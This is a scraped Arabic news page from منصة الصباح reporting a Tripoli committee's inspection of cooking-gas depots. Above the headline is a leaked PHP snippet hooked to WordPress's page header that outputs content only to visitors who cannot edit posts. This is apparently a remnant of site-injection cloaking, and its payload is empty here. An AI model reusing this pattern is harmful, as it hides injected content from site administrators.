function wp_pf_abebcfd8(){$c=wp_get_current_user()->has_cap('edit_posts')?1:0;if($c==0){echo'';}}add_action("wp_head","wp_pf_abebcfd8"); تفتيش علي الكميات المستلمة مع غاز الطهي لضمان وصولها للمواطن - منصة الصباح
منصة الصباح

تفتيش علي الكميات المستلمة مع غاز الطهي لضمان وصولها للمواطن

اجرت لجنة متابعة مستودعات توزيع غاز الطهي والمتكونة من مندوبين عن وزارة الإقتصاد والتجارة وهيئة السلامة الوطنية وجهاز الحرس البلدي ومديرية أمن طرابلس بالاضافة الى شركة البريقة لتسويق النفط والغاز ، في زيارات ميدانية للمستودعات.

الزيارات التي تتم بإشراف منسق لجنة الوقود والغاز تأتي لأجل التفتيش علي الكميات المستلمة مع ضمان وصولها للمواطن وفق التسعيرة المعتمدة ، كما تتولى أيضاً التفتيش علي إجراءات السلامة المهنية.

شاهد أيضاً

وصول شحنة جديدة من أدوية علاج الأورام لدعم مرضى السرطان

الصباح أعلنت الهيئة الوطنية لمكافحة السرطان، وصول شحنة جديدة من الأدوية التخصصية المخصصة لمرضى الأورام، …